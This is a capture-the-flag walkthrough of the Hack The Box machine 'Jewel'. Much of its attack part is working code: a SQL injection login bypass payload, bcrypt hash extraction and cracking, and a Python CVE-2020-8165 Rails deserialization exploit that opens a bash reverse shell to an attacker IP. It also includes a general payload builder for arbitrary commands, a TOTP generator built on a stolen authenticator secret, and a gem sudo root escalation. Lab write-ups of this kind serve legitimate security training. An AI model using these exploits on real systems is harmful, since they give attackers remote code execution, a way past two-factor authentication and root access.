Hack-The-Box-walkthrough[jewel]

Introduction

OS: Linux
Difficulty: Medium
Points: 30
Release: 10 Oct 2020
IP: 10.10.10.211

User Blood haqpl 00 days, 01 hours, 43 mins, 28 seconds.
Root Blood Ziemni 00 days, 02 hours, 59 mins, 53 seconds.

information gathering

First, run nmap as usual:

root@kali:~/hackthebox/machine# nmap -sV -p- -v --min-rate=10000 10.10.10.211
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8000/tcp open http Apache httpd 2.4.38
8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6)
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • No exploit found for these nginx and Phusion Passenger versions, so create an account and explore the application
  • The profile picture cannot be changed, so there is no file-upload attack surface
  • Users cannot create content, so injection points are limited
  • Enumerated directories:
/login (Status: 200)
/users (Status: 500)
/404 (Status: 200)
/articles (Status: 200)
/signup (Status: 200)
/500 (Status: 200)
/422 (Status: 200)
  • Nothing interesting here; moving on to port 8000.
  • Two users are obtained there, jennifer and bill; bill's password cracks to spongebob (see below).
  • SQL injection testing on the login form, payload:
' 1 or 1 = 1 -- -
  • The username was rejected as invalid, but the SQL payload was accepted in the password field.
  • Logging in with the username test_wr3nch and the password ' or 1 = 1 -- - (the username is changed because the payload is not valid as a username).

Port 8000

root@kali:~/hackthebox/machine/jewel# curl --head http://jewel.htb:8000/ -L
HTTP/1.1 302 Found
Date: Wed, 14 Oct 2020 08:56:30 GMT
Server: Apache/2.4.38 (Debian)
Location: http://jewel.htb:8000/gitweb/
Content-Type: text/html; charset=iso-8859-1

HTTP/1.1 200 OK
Date: Wed, 14 Oct 2020 08:56:42 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
  • No Apache exploits in searchsploit for this version
  • The server hosts gitweb (a web front end for git repositories)
<!-- git web interface version 2.20.1, (C) 2005-2006, Kay Sievers <kay.sievers@vrfy.org>, Christian Gierke -->
<!-- git core binaries version 2.20.1 -->
  • A lone console.log() in app/assets/javascripts/application.js:
console.log("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
  • Got a hint from za10bx#3725 pointing at Redis.
  • Looking deeper into the gitweb repository:
  • db has a schema and a file noting that everything is default
  • lib has nothing
  • log has nothing
  • public has the files found by directory enumeration
  • storage has nothing
  • test has nothing
  • tmp has nothing
  • vendor has nothing

The bd.sql file, a PostgreSQL database dump (PostgreSQL 11, Debian build), contains the users table:

id  username  email              created                     updated                     bcrypt hash
1   bill      bill@mail.htb      2020-08-25 08:13:58.662464  2020-08-25 08:13:58.662464  $2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
2   jennifer  jennifer@mail.htb  2020-08-25 08:54:42.8483    2020-08-25 08:54:42.8483    $2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
  • config.ru has nothing of interest
  • In the Gemfile, redis is included as a gem

Crack the hashes from port 8000 with john, then back to port 8080:

root@kali:~/hackthebox/machine/jewel# john -format=bcrypt hashes -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Session completed
Password obtained: spongebob
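The dump is the whole reason the hashes are crackable offline, so it is worth being able to pull them out of a pg_dump file mechanically rather than by eye. The following Python is an added example, not code from the original page: it parses the COPY ... FROM stdin blocks that pg_dump writes (tab-separated rows, terminated by a line containing only "\."), keeps the rows whose password column is a bcrypt digest, emits them in the user:hash form john expects, and reads the cost factor out of the digest. The sample dump text is constructed here to mirror the two rows above; the column names in its COPY header are assumed (Rails conventions), the hashes are the ones from the page.

```python
"""Pull bcrypt hashes out of a pg_dump text dump and emit john input.

Added example: parses the COPY ... FROM stdin blocks that pg_dump writes
(tab-separated rows terminated by a line containing only "\\."), keeps the
rows whose password column looks like bcrypt, and reports the work factor.
"""
import re

# Constructed sample modelled on the users table in bd.sql; the column names in the
# COPY header are assumed (Rails conventions), the two rows are the ones from the dump.
SAMPLE_DUMP = """--
-- Data for Name: users; Type: TABLE DATA; Schema: public
--

COPY public.users (id, username, email, created_at, updated_at, password_digest) FROM stdin;
1\tbill\tbill@mail.htb\t2020-08-25 08:13:58.662464\t2020-08-25 08:13:58.662464\t$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
2\tjennifer\tjennifer@mail.htb\t2020-08-25 08:54:42.8483\t2020-08-25 08:54:42.8483\t$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
\\.
"""

COPY_HEADER = re.compile(r"^COPY\s+(\S+)\s+\((.*?)\)\s+FROM\s+stdin;\s*$")
# $2a$ / $2b$ / $2x$ / $2y$, two-digit cost, then 22 chars of salt + 31 chars of hash = 53
BCRYPT = re.compile(r"^\$2[abxy]\$(\d{2})\$[./A-Za-z0-9]{53}$")


def parse_copy_blocks(dump):
    """Yield (table, columns, rows) for each COPY block. \\N is NULL; other backslash
    escapes (\\t, \\n, \\\\) are not unescaped here, which is fine for hash columns."""
    lines = dump.splitlines()
    i = 0
    while i < len(lines):
        m = COPY_HEADER.match(lines[i])
        i += 1
        if not m:
            continue
        table, columns = m.group(1), [c.strip() for c in m.group(2).split(",")]
        rows = []
        while i < len(lines) and lines[i] != "\\.":
            rows.append([None if f == "\\N" else f for f in lines[i].split("\t")])
            i += 1
        i += 1  # skip the "\." terminator
        yield table, columns, rows


def bcrypt_cost(digest):
    """Return the bcrypt cost (log2 of the iteration count), or None if not bcrypt."""
    m = BCRYPT.match(digest or "")
    return int(m.group(1)) if m else None


def john_lines(dump, user_col="username", hash_col="password_digest"):
    """'user:hash' lines for john --format=bcrypt, one per row with a bcrypt digest."""
    out = []
    for _table, cols, rows in parse_copy_blocks(dump):
        if user_col not in cols or hash_col not in cols:
            continue
        ui, hi = cols.index(user_col), cols.index(hash_col)
        for row in rows:
            if bcrypt_cost(row[hi]) is not None:
                out.append(f"{row[ui]}:{row[hi]}")
    return out


if __name__ == "__main__":
    for line in john_lines(SAMPLE_DUMP):
        _user, digest = line.split(":", 1)
        cost = bcrypt_cost(digest)
        # cost 12 -> 2**12 = 4096 iterations, which is john's "Cost 1 (iteration count) is 4096"
        print(f"{line}   # cost {cost} = {2 ** cost} iterations")
    # then: john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hashes
```

Cost 12 means 4096 Blowfish key-setup rounds per guess, which is why john only gets through rockyou at all because spongebob sits near the top of the list; the same dump with cost 4 would crack orders of magnitude faster.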

Get user shell

  • Looking at the Redis / Ruby on Rails CVEs.

  • CVE-2020-8165: untrusted Marshal deserialization in Rails' ActiveSupport cache stores (MemCacheStore and RedisCacheStore), fixed in Rails 5.2.4.3 / 6.0.3.1: https://github.com/masahiro331/CVE-2020-8165

  • Looking at the PoC:

curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%15%60touch+%2Ftmp%2Frce%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T'
  • Decoding the URL encoding gives:
localhost:3000/users?new=o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy	:@instanceo:ERB:	@srcI"`touch /tmp/rce`:ET:@filenameI"1;	T:@linenoi:@method:result:	@varI"@result;	T:@deprecatorIu:ActiveSupport::Deprecation
  • We have our payload; where do we inject it? The only available inputs are login, signup and edit profile. Login and signup return errors, which leaves edit profile.

  • While editing the username, capture the request in Burp and send it to Repeater. Put the URL-encoded payload in the username parameter and send the request twice.

  • Then load http://jewel.htb:8080/articles twice while listening on the chosen port to catch the reverse shell.

  • Or, more easily, use the following Python 3 script:

getuser.py

import requests
import re
import sys

if len(sys.argv) != 4:
    print("usage: python3 getuser.py <target IP> <your IP> <your port>")
    exit(0)

URL = 'http://{}:8080'.format(sys.argv[1])
username = 'myuser4'
password = 'mypass4'
email = 'myuser4@mail.com'

s = requests.Session()

# Rails puts the CSRF token in <meta name="csrf-token" content="...">; it is bound to the
# session cookie, so the one token works for every form posted from this session
resp = s.get(URL + '/signup')
rx = r'token" content="(.*)"'
token = re.search(rx, resp.text).group(1)

# create user
data = {}
data['utf8'] = '✓'
data['authenticity_token'] = token
data['user[username]'] = username
data['user[email]'] = email
data['user[password]'] = password
data['commit'] = 'Create User'
resp = s.post(URL + '/users', data=data)

# login
data = {}
data['utf8'] = '✓'
data['authenticity_token'] = token
data['session[email]'] = email
data['session[password]'] = password
data['commit'] = 'Log in'
resp = s.post(URL + '/login', data=data)

# our numeric user id, taken from the profile link in the rendered page
rx = r'href="/users/([^"]+)"'
user_id = re.search(rx, resp.text).group(1)

# rev shell: the PoC's Marshal payload with the ERB @src string replaced by our command in backticks.
# Marshal stores a short string length as len+5 in one byte; the string is the command plus two
# backticks, hence len(rev)+7. That single byte is only valid while len(rev)+2 < 123.
rev = "bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(sys.argv[2], sys.argv[3])
assert len(rev) + 2 < 123, "command too long for a one-byte Marshal length"
payload = '\x04\x08o\x3A\x40ActiveSupport\x3A\x3ADeprecation\x3A\x3ADeprecatedInstanceVariableProxy'
payload += '\x09\x3A\x0E\x40instanceo\x3A\x08ERB\x08\x3A\x09\x40srcI\x22'
payload += '{}\x60{}\x60'.format(chr(len(rev) + 7), rev)
payload += '\x06\x3A\x06ET\x3A\x0E\x40filenameI\x22\x061\x06\x3B\x09T\x3A\x0C\x40linenoi\x06\x3A\x0C\x40method\x3A'
payload += '\x0Bresult\x3A\x09\x40varI\x22\x0C\x40result\x06\x3B\x09T\x3A\x10\x40deprecatorIu\x3A\x1F'
payload += 'ActiveSupport\x3A\x3ADeprecation\x00\x06\x3B\x09T'

# update the username with the payload (sent twice, as in the manual Burp steps)
data = {}
data['utf8'] = '✓'
data['authenticity_token'] = token
data['_method'] = 'patch'
data['user[username]'] = payload
data['commit'] = 'Update User'
s.post(URL + '/users/' + user_id, data=data)
s.post(URL + '/users/' + user_id, data=data)

# rendering /articles deserializes the cached value and fires the reverse shell
s.get(URL + '/articles')
root@kali:~/hackthebox/machine/jewel# python3 getuser.py 10.10.10.211 10.10.14.3 3344
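The script above hand-encodes the Marshal string length as chr(len(rev)+7), which is only right for commands up to 120 bytes; beyond that Ruby's Marshal switches to a multi-byte length and the payload fails to load. The following Python is an added example, not part of the original page or of the PoC repository: it builds the same CVE-2020-8165 payload for a command of any length by implementing Ruby's Marshal integer encoding (w_long) and symbol table (the MarshalWriter helper is mine), and when given touch /tmp/rce it reproduces the PoC's URL-encoded query value byte for byte. The object graph is the one in the PoC: a DeprecatedInstanceVariableProxy whose @instance is an ERB with attacker-controlled @src and whose @method is :result, so any method call on the proxy after Marshal.load evaluates the template and the backticks run the command.

```python
"""Build the CVE-2020-8165 Marshal payload for an arbitrary command.

Added example: reimplements the byte layout of the PoC payload so that the ERB
source string gets a correct Marshal length prefix whatever its size.
"""
from urllib.parse import quote_plus


def marshal_long(n):
    """Ruby Marshal integer encoding (w_long in marshal.c).

    0 -> 0x00; 1..122 -> n+5 in one byte; -123..-1 -> n-5 in one byte;
    anything else -> a byte count (negative for negative values) followed
    by that many little-endian bytes.
    """
    if n == 0:
        return b"\x00"
    if 0 < n < 123:
        return bytes([n + 5])
    if -124 < n < 0:
        return bytes([(n - 5) & 0xFF])
    out = bytearray()
    x = n
    for i in range(1, 5):
        out.append(x & 0xFF)
        x >>= 8
        if x == 0:
            return bytes([i]) + bytes(out)
        if x == -1:
            return bytes([(-i) & 0xFF]) + bytes(out)
    raise ValueError("integer does not fit in 4 Marshal bytes")


class MarshalWriter:
    """Just enough of the Marshal 4.8 format: symbols (with back-references)
    and ivar-wrapped UTF-8 strings."""

    def __init__(self):
        self.symbols = []

    def sym(self, name):
        # First occurrence is ':' len bytes; later ones are ';' index links
        if name in self.symbols:
            return b";" + marshal_long(self.symbols.index(name))
        self.symbols.append(name)
        raw = name.encode()
        return b":" + marshal_long(len(raw)) + raw

    def string(self, text):
        # 'I' wraps the '"' string so one ivar can follow: :E => true marks it UTF-8
        raw = text.encode()
        return b'I"' + marshal_long(len(raw)) + raw + marshal_long(1) + self.sym("E") + b"T"


def build_payload(cmd):
    """DeprecatedInstanceVariableProxy -> ERB#result on @src, where @src is `cmd`.

    Any method call on the proxy is forwarded to @instance.send(@method), i.e.
    ERB#result, which evals the template source; Ruby backticks run the command.
    """
    w = MarshalWriter()
    p = b"\x04\x08"  # Marshal version 4.8
    p += b"o" + w.sym("ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy") + marshal_long(4)
    p += w.sym("@instance")
    p += b"o" + w.sym("ERB") + marshal_long(3)
    p += w.sym("@src") + w.string("`" + cmd + "`")
    p += w.sym("@filename") + w.string("1")
    p += w.sym("@lineno") + b"i" + marshal_long(1)
    p += w.sym("@method") + w.sym("result")
    p += w.sym("@var") + w.string("@result")
    p += w.sym("@deprecator")
    # 'u' = user-marshalled object (_dump/_load) with zero bytes of data, 'I'-wrapped for the :E ivar
    p += b"Iu" + w.sym("ActiveSupport::Deprecation") + marshal_long(0) + marshal_long(1) + w.sym("E") + b"T"
    return bytes(p)


def url_encoded_payload(cmd):
    """The form the PoC passes in the ?new= query string (spaces become '+')."""
    return quote_plus(build_payload(cmd))


if __name__ == "__main__":
    print(url_encoded_payload("touch /tmp/rce"))
    # A 150-byte command needs a two-byte length prefix (0x01 0x98); chr(len+7) would get this wrong
    print(url_encoded_payload("A" * 150)[:120], "...")
```

To use it in the script above, pass build_payload(rev) as the user[username] form value (requests accepts bytes) instead of the hand-built string; the Redis cache write and the /articles trigger stay the same.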

Get a shell

root@kali:~# nc -lvp 3344
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::3344
Ncat: Listening on 0.0.0.0:3344
Ncat: Connection from 10.10.10.211.
Ncat: Connection from 10.10.10.211:47546.
bash: cannot set terminal process group (791): Inappropriate ioctl for device
bash: no job control in this shell
bill@jewel:~/blog$ id
id
uid=1000(bill) gid=1000(bill) groups=1000(bill)
bill@jewel:~/blog$ whoami
whoami
bill
bill@jewel:~/blog$ cd ~
cd ~
bill@jewel:~$ ls
ls
blog
user.txt
bill@jewel:~$ cat user.txt
cat user.txt
b7c9e7532dda57b2362495bd05367fb0

Get root shell

  • After obtaining the shell, run an enumeration script (LinEnum.sh).
  • The scripts turn up nothing interesting. The sudo version is 1.8.27; checking for its exploits leads to sudo 1.8.27 - Security Bypass https://www.exploit-db.com/exploits/47502 (CVE-2019-14287, which only applies to sudoers rules of the form (ALL, !root), so it is not usable here).
  • Since we have the cracked password spongebob, try sudo -l.
  • sudo -l asks for the password, which is normal, and then for a verification code.
  • ls -la in bill's home directory reveals a hidden file, .google_authenticator.
  • The file holds the TOTP secret key (base32); with it we can compute the verification code ourselves:
bill@jewel:~$ cat .google_authenticator
cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH
  • We used Chromium with an addon, GAuth Authenticator https://chrome.google.com/webstore/detail/gauth-authenticator/ilgcnhelpchnceeipipijaljkblbcobl, to do the task.
  • We pasted the secret into the addon and it provided the OTP; with that we can run sudo -l, and /usr/bin/gem is available to be run as sudo:
bill@jewel:~$ sudo -l 
sudo -l
[sudo] password for bill: spongebob

Verification code: 437542

Matching Defaults entries for bill on jewel:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
insults

User bill may run the following commands on jewel:
(ALL : ALL) /usr/bin/gem
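The first line of .google_authenticator is a base32 TOTP seed (RFC 6238: HMAC-SHA1 over the 30-second counter, truncated to six digits), so the verification code sudo asks for can be computed in the shell you already have, without a browser addon. The following Python is an added example that is not from the original page: it decodes the unpadded seed, derives the current code, and lists every code the PAM module would accept for the WINDOW_SIZE 17 shown in the file. The HOTP/TOTP arithmetic is checked against the RFC 4226 / RFC 6238 test vectors; the reading of WINDOW_SIZE 17 as the current step plus eight steps either side follows the google-authenticator-libpam documentation.

```python
"""TOTP (RFC 6238) from a google-authenticator secret, plus the PAM acceptance window.

Added example: computes the verification code sudo asks for from the base32
seed in ~/.google_authenticator instead of pasting it into a browser addon.
"""
import base64
import hmac
import struct
import time
from hashlib import sha1

# First line of bill's .google_authenticator, as shown on this page
JEWEL_SECRET = "2UQI3R52WFCLE6JTLDCSJYMJH4"
# Shared secret from the RFC 4226 / RFC 6238 test vectors (ASCII "12345678901234567890")
RFC6238_SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"


def decode_secret(b32):
    """google-authenticator writes the seed as unpadded base32; restore the padding."""
    b32 = b32.strip().upper().replace(" ", "")
    b32 += "=" * (-len(b32) % 8)
    return base64.b32decode(b32)


def hotp(key, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(b32, at=None, step=30, digits=6):
    """RFC 6238: HOTP with counter = unix time // step."""
    at = time.time() if at is None else at
    return hotp(decode_secret(b32), int(at) // step, digits)


def accepted_codes(b32, at, window=17, step=30):
    """Codes pam_google_authenticator accepts with WINDOW_SIZE=window: the current
    step plus (window-1)//2 steps either side, so 17 means +/-8 steps = +/-4 minutes.
    That tolerance is why a code read from a slightly skewed device still works."""
    key = decode_secret(b32)
    counter = int(at) // step
    half = (window - 1) // 2
    return [hotp(key, counter + d) for d in range(-half, half + 1) if counter + d >= 0]


if __name__ == "__main__":
    now = time.time()
    print("verification code:", totp(JEWEL_SECRET, now),
          "valid for another", 30 - int(now) % 30, "seconds")
    print("codes accepted with WINDOW_SIZE 17:", " ".join(accepted_codes(JEWEL_SECRET, now)))
```

Run it on the box itself (python3 is present, since the target runs Rails on Debian 10 and the shell is bill's) or locally; the only requirement is that the clock of the machine computing the code is within the four-minute window of the target's clock.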
  • With the gem entry on GTFOBins https://gtfobins.github.io/gtfobins/gem we can spawn a root shell:
  • sudo /usr/bin/gem open -e "/bin/sh -c /bin/sh" rdoc
bill@jewel:~$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
# cd ~
cd ~
# ls
ls
root.txt
# cat root.txt
cat root.txt
458f634ac19fdd93ba6027a8cbe34197
  • root.txt is obtained

Summary of knowledge

  • gitweb leaks a .sql dump containing password hashes
  • john cracks the bcrypt hash
  • write a Python 3 exploit script for CVE-2020-8165
  • use the .google_authenticator secret with the Chromium addon GAuth Authenticator to get the verification code
  • gem via GTFOBins for privilege escalation

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I'm lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…